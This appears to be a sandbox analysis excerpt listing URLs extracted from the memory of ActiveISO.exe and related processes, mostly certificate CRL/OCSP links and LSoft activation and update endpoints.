Source: BkTwXj17DH.exe, 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmp, BkTwXj17DH.exe, 00000000.00000000.1415495894.000000000050B000.00000002.00000001.01000000.00000003.sdmp, BkTwXj17DH.exe, 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmp, BkTwXj17DH.exe, 00000002.00000000.1420259549.0000000000D9B000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://bugreports.qt.io/
Source: ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://bugreports.qt.io/_q_receiveReplyMicrosoft-IIS/4.Microsoft-IIS/5.Netscape-Enterprise/3.WebLogi
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: ActiveISO.exe, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://lsoft.net/act/activate.aspx?ID=%1
Source: ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://lsoft.net/act/activate.aspx?ID=%11slotReadyRead()2readyRead()1slotError(QNetworkReply::Networ
Source: ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://lsoft.net/act/activate.aspx?ID=%1Error1slotReadyRead()Error2readyRead()1slotError(QNetworkRep
Source: ActiveISO.exe, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%3
Source: ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%31slotReadyRead()2readyRead()1slotError(QNe
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://t2.symcb.com0
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://tl.symcd.com0&
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.???.xx/?search=%s
Source: ActiveISO.exe, 00000003.00000002.1466012295.00007FFBAA858000.00000002.00000001.01000000.00000010.sdmp, ActiveISO.exe, 00000004.00000002.1533059618.00007FFBA8CB8000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: ActiveISO.exe, 00000003.00000002.1466012295.00007FFBAA858000.00000002.00000001.01000000.00000010.sdmp, ActiveISO.exe, 00000004.00000002.1533059618.00007FFBA8CB8000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.color.org)
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DDBB000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B25570C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: ActiveISO.exe, 00000004.00000000.1455531882.00007FF7F4173000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.lsoft.net
Source: ActiveISO.exe, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%3
Source: ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31DownloadInfo(QString)2DownloadInfo(QString)
Source: ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31GotLatestVersion(QString)2LatestVersion(QSt
Source: ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31LatestVersion(QString)2LatestVersion(QStrin
Source: ActiveISO.exe, 00000004.00000000.1455531882.00007FF7F4173000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.ntfs.com/iso_file_manager.htm
